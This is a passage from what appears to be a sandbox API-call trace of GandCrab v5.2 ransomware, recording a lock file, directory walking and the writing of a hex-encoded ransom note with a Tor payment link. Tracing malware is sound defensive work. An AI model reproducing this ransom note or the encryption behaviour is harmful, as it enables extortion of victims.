x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0069.276] WriteFile (in: hFile=0x2c4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259eab8, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259eab8*=0x2162, lpOverlapped=0x0) returned 1 [0069.277] CloseHandle (hObject=0x2c4) returned 1 [0069.277] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.277] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.277] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xe, wMilliseconds=0x24a)) [0069.277] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.278] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0069.278] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0069.278] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\d2ca4a09d2ca4deb61a.lock") returned 79 [0069.278] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2c4 [0069.279] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.279] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.279] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\") returned 55 [0069.279] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\*" [0069.279] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\*", fInfoLevelId=0x1, lpFindFileData=0x259ead4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ead4) returned 0x503638 [0069.280] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0069.280] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0069.289] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0069.289] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0069.289] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0069.289] lstrcmpW (lpString1="Collab", lpString2=".") returned 1 [0069.289] lstrcmpW (lpString1="Collab", lpString2="..") returned 1 [0069.289] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\", lpString2="Collab" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab" [0069.289] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\" [0069.289] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0069.289] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.290] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0069.290] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.290] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0069.290] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.290] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0069.290] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.290] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0069.290] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.291] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.291] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\\\TITWMVJL-DECRYPT.txt") returned 83 [0069.291] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\collab\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0069.292] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x7